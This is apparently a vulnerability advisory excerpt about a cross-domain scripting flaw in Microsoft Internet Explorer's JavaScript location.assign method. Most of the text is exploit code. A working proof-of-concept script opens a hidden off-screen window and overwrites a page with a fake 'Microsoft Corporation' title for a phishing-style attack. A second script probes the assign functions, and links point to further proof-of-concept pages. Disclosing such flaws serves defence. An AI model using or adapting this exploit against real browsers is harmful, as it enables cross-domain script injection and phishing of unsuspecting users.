|
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
http-equiv, has provided the following exploit that leverages this vulnerability to perform a phishing style attack: <script> //courtesy of Paul function govuln(){ var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:document.innerHTML=&quot;<title>Microsoft Corporation</title>0wned&quot;');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); w.location.assign=location.assign; location.href="http://www.microsoft.com"; } govuln() </script> The following example was provided: <script>; var var1=location.assign; alert("Assign function of the current window:\n"+var1); var w=window.open("about:blank","_blank"); var var2=w.location.assign; var w=alert("Assign function of the new window:\n"+var2); w.close(); </script>; This will reportedly generate two alerts describing the assign(). A further working proof-of-concept is available at the following page: http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm An additional proof-of-concept that demonstrates this issue is available at the following page: http://freehost07.websamba.com/greyhats/evilchild.htm |
|
 Privacy Statement |
